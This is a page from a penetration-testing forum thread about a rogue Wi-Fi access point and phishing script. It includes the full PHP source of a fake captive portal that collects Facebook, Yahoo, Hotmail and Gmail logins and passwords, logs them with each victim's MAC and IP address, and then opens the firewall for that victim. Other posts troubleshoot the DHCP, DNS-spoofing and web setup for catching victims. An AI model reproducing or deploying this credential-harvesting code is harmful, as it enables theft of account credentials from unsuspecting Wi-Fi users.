Page 6 of 14 FirstFirst ... 45678 ... LastLast
Results 51 to 60 of 136

Thread: Soft AP / Phishing Script [Release]

  1. #51
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    @Bl4ckSky, you are using Google DNS (cue posts about privacy )
    The script expects local DNS (e.g. 192.168.1.1)
    Your easiest option might be to add a local DNS address (usually the same as your router/gateway) to your network (which should then update resolv.conf automatically).

  2. #52
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    @VulpiArgenti, can you upload what you have so far with the new captive portal method? I'm not the greatest with php but I can take a look at it.
    Hey devi1, thanks indeed for the offer; was about to upload when I realised I've just fixed it . The only problem was that "global $mac" was in the wrong place, so $mac was not being passed to iptables.
    I'm actually going to leave the script as it is; the workaround with dnotify turns out to be useful (in setting iptables rules for sslstrip).

    Here's the (not pretty but working) service.php

    PHP Code:
    <?php 
     
    //Thanks to: 
    //http://www.andybev.com/index.php/Using_iptables_and_PHP_to_create_a_captive_portal 
    //http://simple-and-hot.blogspot.com.au/2010/05/you-can-do-it-yourself.html 
    //devi1 
     
    //error_reporting(E_ALL); 
    //ini_set ('display_errors', '1'); 
     
    $name $_POST['login']; 
    $password $_POST['password']; 
     
    if(
    $_POST['facebook']){ 
        
    $service "facebook"
    }elseif(
    $_POST['yahoo']){ 
        
    $service "yahoo"
    }elseif(
    $_POST['hotmail']){ 
        
    $service "hotmail"
    }elseif(
    $_POST['gmail']){ 
        
    $service "gmail"

     
     
    sleep(1); 
     
    $error 
    "<html>\n" 
    "<head>\n" 
    "<meta http-equiv=\"Refresh\" content=\"5;url=/\" />\n" 
    "</head>\n" 
    "<body>\n" 
    "<center><p1><b>Login incorrect.</b></p1></center>\n" 
    "<center><p1></p1></center>\n" 
    "</body>\n" 
    "</html>"
     
    $success
    "<html>\n" 
    "<head>\n" 
    "</head>\n" 
    "<body>\n" 
    "<center><p1>Authorized</p1></center>\n" 
    "<center><p1>Continue browsing</p1></center>\n" 
    "</body>\n" 
    "</html>"
     
     
    $arp "/usr/sbin/arp"
     
    if((
    $password == "") || ($name == "")){ 
        echo 
    $error;  // if credentials not entered 
    } else {  
        
    // Attempt to get the client's mac address 
        
    $mac shell_exec("$arp -a ".$_SERVER['REMOTE_ADDR']); 
        
    preg_match('/..:..:..:..:..:../',$mac $matches); 
        @
    $mac $matches[0]; 
      
        
    $ip $_SERVER["REMOTE_ADDR"]; 
     
        
    $accinfo "login: $name    pass: $password    service: $service\nMAC: $mac    IP: $ip\n----------------\n"
     
        
    // Write out the credentials 
        
    $fp fopen("formdata.txt""a"); 
        
    fwrite($fp$accinfo); 
        
    fclose($fp); 
         
        if (!isset(
    $mac)) { echo $error
        } else { 
            global 
    $mac
            
    iptables(); 
            echo 
    $success; } 

    function 
    iptables() { 
         
            global 
    $mac
            
    // Allow through the captive portal 
            
    exec("sudo /sbin/iptables -t nat -I PREROUTING -m mac --mac-source $mac -j ACCEPT"); 
            } 
    ?>
    Last edited by VulpiArgenti; 04-28-2012 at 08:02 AM. Reason: Added service.php

  3. #53
    Just burned their ISO
    Join Date
    Jan 2010
    Posts
    15

    Default Re: Soft AP / Phishing Script [Release]

    A video tutorial for option 3 will be great

  4. #54
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    Good idea. Why don't you make one?

  5. #55
    Just burned their ISO
    Join Date
    Jan 2010
    Posts
    15

    Default Re: Soft AP / Phishing Script [Release]

    The Author knows better how to present it

  6. #56
    Junior Member
    Join Date
    Dec 2011
    Posts
    30

    Default Riferimento: Re: Soft AP / Phishing Script [Release]

    hello VulpiArgenti, sorry i couldn't answer sooner...anyway when the victim connects the DCHP tail stays empty, and so the dnsspoof. the only signal i have about the connection is just the first eterm window, where i get the mac of the victim, and nothing else. so obviously the problem resides in the DHCP server...i tried to remove/reinstall the whole DHCP group but without success maybe something in the configuration of the server? i don't modify the default values you included in the script, i just add the channel of the fake ap. thank you again for your patience




    Quote Originally Posted by VulpiArgenti View Post
    Hi bugme,

    Thanks for your comments - much appreciated.

    Regarding the Eterm colours, you can see on the screenshot that they should be a very readable purple/yellow. Please launch Eterm then adjust the background settings: transparency off, pixmap none; then "save theme settings". This gives a blank background to show the script colours.

    You shouldn't need to create any additional directories once you have moved "hotspot" into /var/www. Your directory setup should look like this:

    Code:
    root@bt:~# ls /var/www
    hotspot  index.html  wstool
    root@bt:~# ls /var/www/hotspot
    facebookLogo.jpg  GmailLogo.png   HotmailLogo.png  process-form-data.php
    formdata.txt      GoogleWifi.jpg  index.html       yahoo.gif
    And then running the script (red is your entries):
    Code:
    Setting up the web page
    
    MUST have directory structure set up correctly
    
    Available web directories:
    hotspot
    index.html
    wstool
    
    Select directory
    hotspot
    
    hotspot/index moved into position
    
    Starting Apache...
     * Starting web server apache2                                                [ OK ] 
    ...success
    
    Starting DNS spoofing...
    
    Do you want to tail the credentials txtfile? (y/n)
    y
    
    
    facebookLogo.jpg  GmailLogo.png   HotmailLogo.png  process-form-data.php
    formdata.txt      GoogleWifi.jpg  index.html       yahoo.gif
    
    Enter name of txtfile
    formdata.txt
    
    Web Server attack running
    Try again with it set up like this.

    If there are still problems we need to troubleshoot your victim's connection. Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?

  7. #57
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    Hi bugme, it does sound like a DHCP problem. Could you post the config file the script generates (cat /tmp/dhcpd.conf)?

    Also suggest trying a static IP (in the range 192.168.0.100-200) on your victim, and also different clients (smartphone etc)

  8. #58
    Just burned his ISO
    Join Date
    May 2012
    Posts
    11

    Default Re: Soft AP / Phishing Script [Release]

    Signed up for this forum specifically to respond to this post.

    Fantastic script.

    Just downloaded, going to play with it tonight.

  9. #59
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: Soft AP / Phishing Script [Release]

    Hi
    I am having trouble with dhcp
    client connects and never gets an IP address
    the file /tmp/dhcpd.conf does not exist
    tried working through script and the line I am having problem with is
    line 720 mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
    I get invalid user dhcpd:dhcpd from the section "chown dhcpd:dhcpd /var/run/dhcpd"
    is it permissions set wrong or some other basic problem ?
    many thanks

  10. #60
    Junior Member
    Join Date
    Dec 2011
    Posts
    30

    Default Re: Soft AP / Phishing Script [Release]

    Quote Originally Posted by VulpiArgenti View Post
    Hi bugme, it does sound like a DHCP problem. Could you post the config file the script generates (cat /tmp/dhcpd.conf)?

    Also suggest trying a static IP (in the range 192.168.0.100-200) on your victim, and also different clients (smartphone etc)

    default-lease-time 300;
    max-lease-time 360;
    ddns-update-style none;
    authoritative;
    log-facility local7;
    subnet 192.168.0.0 netmask 255.255.255.0 {
    range 192.168.0.100 192.168.0.200;
    option routers 192.168.0.1;
    option domain-name-servers 192.168.2.1;
    }


    i tried a couple of devices, with no real result...using a static IP in the range (192.168.0.101) indeed gave me a line with the name of the device in DHCP server tail, but no connection/spoof/fake html page on the victim

Page 6 of 14 FirstFirst ... 45678 ... LastLast

Similar Threads

  1. SET 0.7 phishing demo
    By pentest09 in forum BackTrack Videos
    Replies: 7
    Last Post: 12-19-2010, 10:31 PM
  2. Soft AP Upside Down image help pls, script nearly works
    By spriggsy in forum Beginners Forum
    Replies: 0
    Last Post: 11-05-2010, 12:01 PM
  3. Soft AP Script not working?
    By spriggsy in forum Beginners Forum
    Replies: 1
    Last Post: 05-19-2010, 01:08 PM
  4. Soft AP bash script
    By junke1990 in forum OLD Wireless
    Replies: 1
    Last Post: 04-03-2010, 08:30 AM
  5. backtrack 4 pre release user login script
    By eidos in forum OLD Newbie Area
    Replies: 1
    Last Post: 07-30-2009, 09:57 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •